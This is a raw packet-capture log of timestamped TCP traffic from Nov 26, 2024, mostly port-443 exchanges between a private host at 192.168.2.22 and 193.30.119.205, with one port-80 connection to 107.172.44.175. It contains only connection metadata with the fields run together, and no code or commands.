                                                            Nov 26, 2024 15:49:25.918438911 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:25.944027901 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:25.944036961 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:25.944070101 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:25.944091082 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:25.944104910 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:25.973126888 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:25.973138094 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:25.973159075 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:25.973207951 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:25.973207951 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:25.991441965 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:25.991465092 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:25.991475105 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:25.991491079 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:25.991504908 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:25.991512060 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.036086082 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.036098957 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.036117077 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.036134958 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.036150932 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.036163092 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.141592979 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.141604900 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.141633987 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.141650915 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.141670942 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.141711950 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.158751011 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.158761978 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.158782959 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.158807993 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.158823013 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.173321962 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.173332930 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.173365116 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.173378944 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.173410892 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.184798956 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.184808969 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.184844971 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.184849977 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.184896946 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.193672895 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.193681002 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.193725109 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.193733931 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.202634096 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.202646017 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.202688932 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.202703953 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.213788986 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.213799000 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.213839054 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.213851929 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.213862896 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.255672932 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:26.336781025 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.336793900 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.336935043 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.337023973 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.344001055 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.344011068 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.344036102 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.344078064 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.344124079 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.344172001 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.353584051 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.353600025 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.353627920 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.353653908 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.353682995 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.360929012 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.360937119 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.360961914 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.361006021 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.361006975 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.368241072 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.368249893 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.368269920 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.368314981 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.368407011 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.376337051 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.376346111 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.376415014 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.376435995 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.381303072 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.381388903 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.381407022 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.381426096 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.381488085 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.386260033 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.386270046 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.386339903 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.386356115 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.392703056 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.392774105 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.392791033 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.397840023 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.397912979 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.397957087 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.403419971 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.403512001 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.403527975 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.408417940 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.408489943 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.408515930 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.414829969 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.414891958 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.414905071 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.419907093 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.419966936 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.419976950 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.547806978 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.547899961 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.547940016 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.551994085 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.552007914 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.552035093 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.552057981 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.552088022 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.552117109 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.552159071 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.557174921 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.557184935 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.557210922 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.557250023 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.557250023 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.561691046 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.561700106 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.561719894 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.561748028 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.561769009 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.565380096 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.565387964 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.565445900 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.565479040 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.570597887 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.570645094 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.570660114 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.570677042 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.570735931 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.574863911 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.574873924 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.574940920 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.574956894 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.578742027 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.578805923 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.578821898 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.583975077 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.584042072 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.584055901 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.588628054 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.588715076 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.588728905 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.592833042 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.592905045 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.592921972 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.596843004 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.596910000 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.596925020 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.602065086 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.602138042 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.602152109 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.606257915 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.606317043 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.606331110 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.610269070 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.610328913 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.610344887 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.758536100 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.758671999 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.758749008 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.762361050 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.762370110 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.762391090 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.762428045 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.762454033 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.762530088 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.767469883 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.767478943 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.767499924 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.767543077 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.767544031 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.771414042 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.771423101 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.771442890 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.771478891 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.771502972 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.776387930 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.776396990 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.776417971 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.776443958 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.776472092 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.780328989 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.780339956 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.780400991 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.780420065 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.789338112 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.789391041 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.789426088 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.789443016 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.789498091 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.789808989 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.789819002 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.789870977 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.789886951 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.793410063 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.793476105 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.793490887 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.798122883 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.798191071 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.798206091 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.802241087 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.802309036 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.802324057 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.807015896 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.807086945 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.807126045 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.810998917 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.811072111 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.811086893 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.815026045 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.815119982 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.815135002 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.820053101 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.820137024 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.820154905 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.823919058 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.824006081 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.824023962 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.968740940 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.968879938 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.968947887 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.973046064 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.973056078 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.973078012 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.973115921 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.973143101 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.973211050 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.977565050 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.977572918 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.977593899 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.977638006 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.977638960 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.981333017 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.981340885 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.981359959 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.981396914 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.981396914 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.986123085 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.986131907 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.986191988 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.986208916 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.989722013 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.989729881 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.989784956 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.989800930 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.993505001 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.993514061 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.993592978 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.993608952 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.998388052 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.998423100 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.998450041 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:26.998465061 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:26.998529911 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:27.001959085 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.001966953 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.002041101 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:27.002070904 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.006186008 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.006254911 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:27.006269932 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.010062933 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.010134935 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:27.010149956 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.014833927 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.014966965 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:27.015002012 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.018404961 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.018493891 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:27.018518925 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.022217035 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.022303104 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:27.022325039 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.026876926 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.026983976 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:27.027040958 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.030556917 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.030642033 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:27.030667067 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.180191040 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.180443048 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:27.180520058 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.183947086 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.183955908 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.183978081 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.184011936 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:27.184056997 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.184118032 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:27.187524080 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.187532902 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.187566996 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.187604904 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:27.187630892 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:27.192121983 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.192130089 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.192150116 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.192212105 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:27.192240000 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:27.195926905 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.195935965 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.195956945 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.196007013 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:27.196028948 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:27.200022936 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.200031042 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.200100899 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:27.200124025 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.204344034 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.204380035 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.204421997 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:27.204442024 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.204495907 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:27.207832098 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.207840919 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.207916021 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:27.207936049 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.212426901 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.212513924 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:27.212532043 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.215996027 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.216075897 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:27.216093063 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.220159054 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.220242977 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:27.220257044 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:27.223947048 CET44349168193.30.119.205192.168.2.22
